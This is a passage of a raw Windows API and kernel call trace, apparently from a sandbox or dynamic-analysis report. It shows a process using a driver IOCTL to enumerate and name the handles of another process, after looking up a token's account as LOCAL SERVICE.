HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800287e060, HandleInformation=0x0) returned 0x0 [0226.663] ObOpenObjectByPointer (in: Object=0xfffffa800287e060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0226.663] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4d [0226.663] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa800252d1c0 | out: TokenHandle=0xfffffa800252d1c0*=0xc4) returned 0x0 [0226.663] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0226.663] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.663] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.663] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.665] CloseHandle (hObject=0xc4) returned 1 [0226.665] CloseHandle (hObject=0xc8) returned 1 [0226.665] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.665] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0226.665] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.665] PsAcquireProcessExitSynchronization () returned 0x0 [0226.665] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.665] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e86f20, HandleInformation=0x0) returned 0x0 [0226.665] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.665] PsReleaseProcessExitSynchronization () returned 0x2 [0226.665] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.665] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.665] ObfDereferenceObject (Object=0xfffffa8001e86f20) returned 0x1 [0226.665] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.665] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.665] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.665] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0226.665] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.665] PsAcquireProcessExitSynchronization () returned 0x0 [0226.665] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.665] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037a0a20, HandleInformation=0x0) returned 0x0 [0226.665] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.665] PsReleaseProcessExitSynchronization () returned 0x2 [0226.665] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.665] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.665] ObfDereferenceObject (Object=0xfffffa80037a0a20) returned 0x1 [0226.665] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.666] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.666] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.666] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0226.666] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.666] PsAcquireProcessExitSynchronization () returned 0x0 [0226.666] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.666] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0226.666] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.666] PsReleaseProcessExitSynchronization () returned 0x2 [0226.666] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.666] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.666] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0226.666] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.666] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.666] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.666] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0226.666] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.666] PsAcquireProcessExitSynchronization () returned 0x0 [0226.666] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.666] ObReferenceObjectByHandle (in: Handle=0xdc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0226.666] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.666] PsReleaseProcessExitSynchronization () returned 0x2 [0226.666] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.666] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.666] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0226.666] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.666] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.666] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.666] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0226.667] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.667] PsAcquireProcessExitSynchronization () returned 0x0 [0226.667] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.667] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0226.667] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.667] PsReleaseProcessExitSynchronization () returned 0x2 [0226.667] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.667] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.667] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0226.667] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.667] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.667] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.667] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0226.667] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.667] PsAcquireProcessExitSynchronization () returned 0x0 [0226.667] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.667] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800298b6a0, HandleInformation=0x0) returned 0x0 [0226.667] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.667] PsReleaseProcessExitSynchronization () returned 0x2 [0226.667] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.667] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.667] ObfDereferenceObject (Object=0xfffffa800298b6a0) returned 0x3 [0226.667] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.667] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.667] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.667] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0226.667] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.667] PsAcquireProcessExitSynchronization () returned 0x0 [0226.667] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.667] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00195b490, HandleInformation=0x0) returned 0x0 [0226.668] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.668] PsReleaseProcessExitSynchronization () returned 0x2 [0226.668] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.668] ObQueryNameString (in: Object=0xfffff8a00195b490, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.668] ObfDereferenceObject (Object=0xfffff8a00195b490) returned 0x2 [0226.668] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.668] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.668] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.668] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0226.668] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.668] PsAcquireProcessExitSynchronization () returned 0x0 [0226.668] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.668] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a00150f740, HandleInformation=0x0) returned 0x0 [0226.668] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.668] PsReleaseProcessExitSynchronization () returned 0x2 [0226.668] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.668] ObQueryNameString (in: Object=0xfffff8a00150f740, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.668] ObfDereferenceObject (Object=0xfffff8a00150f740) returned 0x2 [0226.668] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.668] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.668] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.668] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0226.668] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.668] PsAcquireProcessExitSynchronization () returned 0x0 [0226.668] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.668] ObReferenceObjectByHandle (in: Handle=0x158, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b55980, HandleInformation=0x0) returned 0x0 [0226.668] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.669] PsReleaseProcessExitSynchronization () returned 0x2 [0226.669] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.669] ObQueryNameString (in: Object=0xfffff8a001b55980, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.669] ObfDereferenceObject (Object=0xfffff8a001b55980) returned 0x2 [0226.669] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.669] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.669] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.669] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x102, lpOverlapped=0x0) returned 1 [0226.669] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.669] PsAcquireProcessExitSynchronization () returned 0x0 [0226.669] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.669] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80019e9070, HandleInformation=0x0) returned 0x0 [0226.669] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.669] PsReleaseProcessExitSynchronization () returned 0x2 [0226.669] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.669] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.669] ObfDereferenceObject (Object=0xfffffa80019e9070) returned 0x1 [0226.669] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.669] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.669] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.669] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0226.669] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.669] PsAcquireProcessExitSynchronization () returned 0x0 [0226.669] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.669] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800385c5e0, HandleInformation=0x0) returned 0x0 [0226.669] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.669] PsReleaseProcessExitSynchronization () returned 0x2 [0226.669] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.669] ObQueryNameString (in: Object=0xfffffa800385c5e0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.670] ObfDereferenceObject (Object=0xfffffa800385c5e0) returned 0x1 [0226.670] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.670] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.670] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.670] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0226.670] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.670] PsAcquireProcessExitSynchronization () returned 0x0 [0226.670] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.670] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fbfc80, HandleInformation=0x0) returned 0x0 [0226.670] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.670] PsReleaseProcessExitSynchronization () returned 0x2 [0226.670] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.670] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.670] ObfDereferenceObject (Object=0xfffffa8001fbfc80) returned 0x1 [0226.670] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.670] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.670] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.670] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0226.670] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.670] PsAcquireProcessExitSynchronization () returned 0x0 [0226.670] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.670] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002072760, HandleInformation=0x0) returned 0x0 [0226.670] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.670] PsReleaseProcessExitSynchronization () returned 0x2 [0226.670] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.670] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.670] ObfDereferenceObject (Object=0xfffffa8002072760) returned 0x1 [0226.670] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.670] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0226.671] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.671] PsAcquireProcessExitSynchronization () returned 0x0 [0226.671] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.671] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002009740, HandleInformation=0x0) returned 0x0 [0226.671] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.671] PsReleaseProcessExitSynchronization () returned 0x2 [0226.671] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0226.671] ObQueryNameString (in: Object=0xfffffa8002009740, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.671] ObfDereferenceObject (Object=0xfffffa8002009740) returned 0x1 [0226.671] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.671] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.671] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.671] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb4, lpOverlapped=0x0) returned 1 [0226.671] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.671] PsAcquireProcessExitSynchronization () returned 0x0 [0226.671] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880052b35d0) [0226.671] ObReferenceObjectByHandle (in: Handle=0x324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b10320, HandleInformation=0x0) returned 0x0 [0226.671] 